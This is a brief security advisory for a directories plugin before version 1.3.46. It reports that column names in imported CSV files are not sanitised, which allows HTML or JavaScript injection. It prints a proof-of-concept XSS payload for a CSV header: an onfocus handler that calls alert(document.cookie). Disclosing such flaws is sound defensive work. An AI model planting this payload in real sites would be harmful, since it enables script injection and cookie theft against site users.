The plugin did not sanitise the column names when importing a malicious CSV file, allowing for HTML or JavaScript injection.
Iimport a CSV file containing the following in the header: ‘term**" autofocus onfocus={alert(‘Complex\u0020XSS’);alert(document.cookie);}//’"
CPE | Name | Operator | Version |
---|---|---|---|
directories | lt | 1.3.46 |